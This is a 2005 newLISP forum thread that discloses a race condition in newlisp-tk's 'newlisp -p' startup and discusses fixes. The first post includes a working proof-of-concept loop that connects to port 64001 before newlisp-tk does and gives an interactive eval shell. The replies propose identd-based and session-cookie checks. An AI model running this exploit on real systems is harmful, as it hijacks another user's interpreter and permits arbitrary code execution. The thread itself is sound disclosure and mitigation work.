newlisp -p security problem

Started by Dmi, August 22, 2005, 12:18:03 AM

Previous topic - Next topic
Print
Go Down Pages1
User actions

Dmi

August 22, 2005, 12:18:03 AM Last Edit: December 31, 1969, 04:00:00 PM by Dmi
try to run following code:
Code Select
(set 'host "127.0.0.1" 'port 64001)
(do-until socket
  (set 'socket (net-connect host port)))
(if (and socket (net-receive socket 'str 512))
  (begin
    (print "connected> " str)
    (do-while (net-send socket (append (read-line) "n"))
      (sleep 1)
      (while (!= (net-peek socket) 0)
        (begin
          (net-receive socket 'str 512)
          (print "got: " str)))
      (print "eval: "))))
(exit)

and, while it is running, try to start newlisp-tk on the same host.

If program above exits silently, try again several times.

If program gives "eval:" prompt, then you gain "newlisp -p" instance started by newlisp-tk:

Try to write lisp expressions...

And check newlisp-tk window - it sucks now.



I can gain shell about 1 of 3-5 tryes...



Problem analysis:

When newlisp-tk starting, it run newlisp -p 64001, then trying to connect to it.

There is some time between newlisp start listen and newlisp-tk send connect to it.

Quite fast malicous program can (statistically) gain race with newlisp-tk.



I think this isn't good... And... it is remotely exploitable too!

I think this functionality must have a strict user authorization (but not by plain passwords ;-) Possible, using randomly generated cookie, known by newlisp and it's client (like X11 magic-cookie) will be sufficient.



But... I think domain sockets will be more useful ;-)
WBR, Dmi

statik

#1
August 22, 2005, 09:09:32 AM Last Edit: December 31, 1969, 04:00:00 PM by statik
Good call. I'm not so hot on the cookie idea though... That's just me.
-statik

Dmi

#2
August 23, 2005, 01:27:09 PM Last Edit: December 31, 1969, 04:00:00 PM by Dmi
As usual, Lutz give the good trick :-)



When newlisp -p started, it begin to interpret the code only after incoming connection is received. So

(net-peer (first (net-sessions)))

will always have return an interactive client ip/port we can then check.



This is the code for local identd-based checking:
Code Select
(load "ident.lsp")
(IDENT:auth-local)

ident client context is available here: http://en.feautec.pp.ru/SiteNews/ContextIDENT">http://en.feautec.pp.ru/SiteNews/ContextIDENT

... and you need a running identd of course.



And this is possible code for session cookie auth:
Code Select
(print "enter session cookie: ")
(if (!= (read-line) "session cookie")  ;-)
  (begin
    (println "session cookie not entered!")
    (exit)))


to use similar code you need to save it in file (say, "netinit.lsp") and then start

$ newlisp -p 12345 netinit.lsp
WBR, Dmi

newdep

#3
August 24, 2005, 02:15:51 AM Last Edit: December 31, 1969, 04:00:00 PM by newdep
Hello Dmi,



That ident.lsp is a nice one, great job...



Regards, Norman.
-- (define? (Cornflakes))
Print
Go Up Pages1
User actions